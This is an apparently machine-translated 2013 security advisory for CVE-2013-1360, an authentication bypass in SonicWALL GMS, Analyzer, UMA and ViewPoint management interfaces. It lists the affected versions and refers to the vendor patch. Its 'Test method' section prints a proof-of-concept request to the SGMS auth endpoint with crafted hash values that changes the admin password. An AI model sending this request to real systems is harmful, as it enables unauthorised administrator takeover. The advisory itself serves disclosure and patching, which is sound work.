Multiple SonicWALL products SGMS interface Authentication Bypass Vulnerability

Release date:
Updated on: 2013-01-22

Affected Systems:
SonicWALL GMS/Analyzer/UMA 7.0.x
SonicWALL GMS/Analyzer/UMA 6.0.x
SonicWALL GMS/Analyzer/UMA 5.1.x
SonicWALL GMS/ViewPoint 5.0.x
SonicWALL GMS/ViewPoint 4.1.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57446
CVE (CAN) ID: CVE-2013-1360
 
SonicWALL provides Internet Security Solutions for small and medium-sized enterprises and distributed enterprises.
 
SonicWALL Global Management System (GMS), ViewPoint, Universal Management Appliance (UMA), Analyzer has the identity verification bypass vulnerability in implementation and sends a specially crafted request to the SGMS interface, attackers can exploit this vulnerability to access Web interfaces with administrator privileges, resulting in arbitrary code execution at the system level.
 
<* Source: Nikolas Sotiriu

Link: http://securitytracker.com/id/1028007
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/sgms/auth? ClientHash = 000083761376339303932346163656262 & amp; clientHash2 = 03196ba18cffc80df87a7c9092 4 acebb & amp; changePassword = 1 & amp; user = admin & amp; ctlSGMSDomainId = dmn1_000000 00000000001

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
SonicWALL
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Http://www.sonicwall.com